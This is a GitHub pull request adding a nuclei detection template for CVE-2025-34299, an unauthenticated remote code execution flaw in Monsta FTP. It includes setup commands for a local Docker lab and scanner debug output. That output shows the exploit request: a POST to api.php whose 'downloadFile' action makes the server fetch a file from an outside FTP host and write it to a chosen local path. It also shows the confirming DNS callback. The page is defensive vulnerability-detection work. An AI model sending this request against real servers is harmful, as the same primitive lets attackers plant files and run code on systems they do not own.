Skip to content

Add CVE-2025-34299 Monsta FTP Pre-Auth RCE template#14331

Merged
theamanrawat merged 4 commits intoprojectdiscovery:mainfrom
KrE80r:CVE-2025-34299-oast
Dec 11, 2025
Merged

Add CVE-2025-34299 Monsta FTP Pre-Auth RCE template#14331
theamanrawat merged 4 commits intoprojectdiscovery:mainfrom
KrE80r:CVE-2025-34299-oast

Conversation

@KrE80r
Copy link
Copy Markdown
Contributor

@KrE80r KrE80r commented Dec 11, 2025
edited
Loading

/claim #14328

CVE-2025-34299 - Monsta FTP Pre-Auth RCE

Test Environment: https://github.com/KrE80r/CVE-2025-34299-lab

git clone https://github.com/KrE80r/CVE-2025-34299-lab
cd CVE-2025-34299-lab
docker-compose up -d
nuclei -t http/cves/2025/CVE-2025-34299.yaml -u http://localhost:8080 -debug

Debug Output:

[INF] Current nuclei version: v3.5.1 (outdated)
[INF] Current nuclei-templates version: v10.3.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 57
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2025-34299] Dumped HTTP request for http://localhost:8080/mftp/

GET /mftp/ HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2025-34299] Dumped HTTP response http://localhost:8080/mftp/

HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset=UTF-8
Date: Thu, 11 Dec 2025 05:24:04 GMT
Server: Apache/2.4.54 (Debian)
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33

<!DOCTYPE html>
<html ng-app="MonstaFTP">
<head>
    <title>Monsta FTP</title>
    <meta charset="UTF-8">
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta name="viewport"
          content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">

    <link rel="shortcut icon" type="image/x-icon" href="application/frontend/images/logo-favicon.png">
    <link rel="apple-touch-icon" href="application/frontend/images/logo-webclip.png">

    <input type="hidden" id="g_defaultLanguage" value="en_us"/>
    <input type="hidden" id="g_xhrTimeoutSeconds" value="30"/>
    <input type="hidden" id="g_isNewWindowsInstall" value="false"/>
    <input type="hidden" id="g_ftpConnectionAvailable" value="true"/>
    <input type="hidden" id="g_openSslAvailable" value="true"/>
    <input type="hidden" id="g_resetPasswordAvailable" value="false"/>
    <input type="hidden" id="g_forgotPasswordAvailable" value="false"/>
    
    <script>
        var g_defaultLanguage = document.getElementById('g_defaultLanguage').value;
        var g_upgradeURL = "http://www.monstaftp.com/upgrade";
        var g_loadComplete = false;
        var g_xhrTimeoutSeconds = +document.getElementById('g_xhrTimeoutSeconds').value;
        var g_isMonstaPostEntry = false;
        var g_isNewWindowsInstall = document.getElementById('g_isNewWindowsInstall').value == 'true';
        var g_ftpConnectionAvailable = document.getElementById('g_ftpConnectionAvailable').value == 'true';
        var g_openSslAvailable = document.getElementById('g_openSslAvailable').value == 'true';
        var g_resetPasswordAvailable = document.getElementById('g_resetPasswordAvailable').value == 'true';
        var g_forgotPasswordAvailable = document.getElementById('g_forgotPasswordAvailable').value == 'true';

            </script>

    <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans:400,600,300">
    <script src="application/frontend/assets-2.10.4/vendor.js"></script>

    <link rel="stylesheet" href="application/frontend/css/monsta.css">
    <link rel="stylesheet" href="settings/theme.css">
    
    <script src="application/frontend/js/monsta-min-2.10.4.js"></script>
    <script src="application/frontend/js/templates-2.10.4.js"></script>

        <script>
        var g_languageFiles = [["en_us","English (US)"]];
    </script>
</head>
<body>

    <div id="spinner" ng-controller="SpinnerController" ng-show="spinnerVisible">
        <div>
            <i class="fa fa-spinner fa-pulse fa-3x fa-fw"></i>
        </div>
    </div>
    <div id="file-xfer-drop" ng-controller="DragDropController">
        <div translate>DROP_FILES_INSTRUCTION</div>
    </div>
    <ng-include src="'application/frontend/templates/modal-chmod.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-login.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-password-management.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-editor.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-transfers.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-prompt.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-confirm.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-error.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-addons.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-settings.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-properties.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-login-link.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-choice.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-update.html'"></ng-include>
    <ng-include src="'application/frontend/templates/modal-upgrade-required.html'"></ng-include>

    <div id="sb-site" canvas="container">
        <ng-include src="'application/frontend/templates/body-header.html'"></ng-include>
        <ng-include src="'application/frontend/templates/body-history.html'"></ng-include>
        <ng-include src="'application/frontend/templates/body-files.html'"></ng-include>
        <ng-include src="'application/frontend/templates/body-footer.html'"></ng-include>
    </div>

    <ng-include src="'application/frontend/templates/body-slidebar.html'"></ng-include>
    <iframe src="about:blank" id="download-iframe"></iframe>
    <script>
        var versionQS = "v=2.10.4&amp;r=http%3A%2F%2Flocalhost%3A8080%2Fmftp%2F&amp;os=Linux&amp;e=s" +getFpQs();
        document.write('<scri' + 'pt async src="//monstaftp.com/_callbacks/latest-version.php?' + versionQS + '"></scr' + 'ipt>')
    </script>
</body>
</html>
[INF] Using Interactsh Server: oast.site
[INF] [CVE-2025-34299] Dumped HTTP request for http://localhost:8080/mftp/application/api/api.php

POST /mftp/application/api/api.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Version/16.3 Safari/605.1.15
Connection: close
Content-Length: 284
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

request={"connectionType":"ftp","configuration":{"host":"d4t5at4h6gvocer84vf0iqhcycd9ws8qn.oast.site","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
[DBG] [CVE-2025-34299] Dumped HTTP response http://localhost:8080/mftp/application/api/api.php

HTTP/1.1 577 Monsta Exception
Connection: close
Content-Length: 240
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Thu, 11 Dec 2025 05:24:13 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: PHPSESSID=dfc61b9995bc63e0f5382c44167a5df6; path=/
X-Powered-By: PHP/7.4.33

{"errors":["FTP connection to d4t5at4h6gvocer84vf0iqhcycd9ws8qn.oast.site:21 failed."],"localizedErrors":[{"errorName":"CONNECTION_FAILURE_ERROR","context":{"protocol":"FTP","host":"d4t5at4h6gvocer84vf0iqhcycd9ws8qn.oast.site","port":21}}]}
[D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN] Received DNS interaction from 172.217.32.208 at 2025-12-11 05:24:13
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 14278
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.   IN       A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 14278
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.   IN       A

;; ANSWER SECTION:
D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.    3600    IN      A       178.128.16.97

;; AUTHORITY SECTION:
D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.    3600    IN      NS      ns1.oast.site.
D4T5At4H6GVOCeR84vF0iqHCyCD9wS8qN.oASt.site.    3600    IN      NS      ns2.oast.site.

;; ADDITIONAL SECTION:
ns1.oast.site.  3600    IN      A       178.128.16.97
ns2.oast.site.  3600    IN      A       178.128.16.97


[CVE-2025-34299:word-1] [http] [critical] http://localhost:8080/mftp/application/api/api.php ["2.10.4"]
[CVE-2025-34299:dsl-2] [http] [critical] http://localhost:8080/mftp/application/api/api.php ["2.10.4"]
[INF] Scan completed in 14.520681811s. 2 matches found.

References:

@KrE80r KrE80r mentioned this pull request Dec 11, 2025
Closed
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Dec 11, 2025
@theamanrawat theamanrawat merged commit 443257a into projectdiscovery:main Dec 11, 2025
3 checks passed
@DhiyaneshGeek DhiyaneshGeek linked an issue Jan 5, 2026 that may be closed by this pull request
CVE-2025-34299 - Monsta FTP - Unrestricted File Upload 💰 #14328
Closed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

@theamanrawat theamanrawat theamanrawat approved these changes

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels

🙋 Bounty claim Done Ready to merge

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

CVE-2025-34299 - Monsta FTP - Unrestricted File Upload 💰

3 participants

@KrE80r @theamanrawat @DhiyaneshGeek